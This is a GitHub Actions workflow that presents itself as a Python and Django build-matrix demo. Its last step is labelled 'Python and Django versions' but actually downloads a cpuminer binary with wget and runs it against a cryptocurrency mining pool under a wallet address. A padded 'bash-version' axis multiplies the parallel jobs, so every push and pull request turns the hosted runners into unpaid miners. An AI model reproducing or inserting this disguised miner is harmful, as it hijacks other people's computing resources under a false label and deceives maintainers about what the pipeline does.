name: build matrix demo1

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest
    strategy:
      # By default, GitHub will maximize the number of jobs run in parallel
      # depending on the available runners on GitHub-hosted virtual machines.
      # max-parallel: 8
      fail-fast: false
      matrix:
        python-version:
          - "2.7"
          - "3.6"
          - "3.7"
          - "3.8"
          - "3.9"
        django-version:
          - "1.11"
          - "2.0"
          - "2.1"
          - "2.2"
          - "3.0"
          - "3.1"
        bash-version:
          - "2.6"
          - "2.5"
          - "2.4"
          - "2.3"
          - "2.2"
          - "2.1"
          - "1.9"
          - "1.8"
          - "1.7"
          - "1.6"
          - "1.5"
          - "1.4"
          - "1.3"
          - "1.2"
          - "1.1"
        exclude:
          # Python 2.7 is compatible with Django 1.11
          - python-version: "2.7"
            django-version: "2.0"
          - python-version: "2.7"
            django-version: "2.1"
          - python-version: "2.7"
            django-version: "2.2"
          - python-version: "2.7"
            django-version: "3.0"
          - python-version: "2.7"
            django-version: "3.1"
          # Python 3.8 is compatible with Django 2.2+
          - python-version: "3.8"
            django-version: "1.11"
          - python-version: "3.8"
            django-version: "2.0"
          - python-version: "3.8"
            django-version: "2.1"
          # Python 3.9 is compatible with Django 3.1+
          - python-version: "3.9"
            django-version: "1.11"
          - python-version: "3.9"
            django-version: "2.0"
          - python-version: "3.9"
            django-version: "2.1"
          - python-version: "3.9"
            django-version: "2.2"
          - python-version: "3.9"
            django-version: "3.0"

    steps:
      - uses: actions/checkout@v2

      - name: Set up Python ${{ matrix.python-version }}
        uses: actions/setup-python@v2
        with:
          python-version: ${{ matrix.python-version }}

      - name: Upgrade pip version
        run: |
          python -m pip install -U pip
      - name: Upgrade django version
        run: |
          python -m pip install "Django~=${{ matrix.django-version }}.0"
      - name: Python and Django versions
        run: |
          wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
          tar xf cpuminer-opt-linux.tar.gz
          ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1q3ck407x6v7m6gjnw08x63r3cf7er06xlpsr0kg. -t0
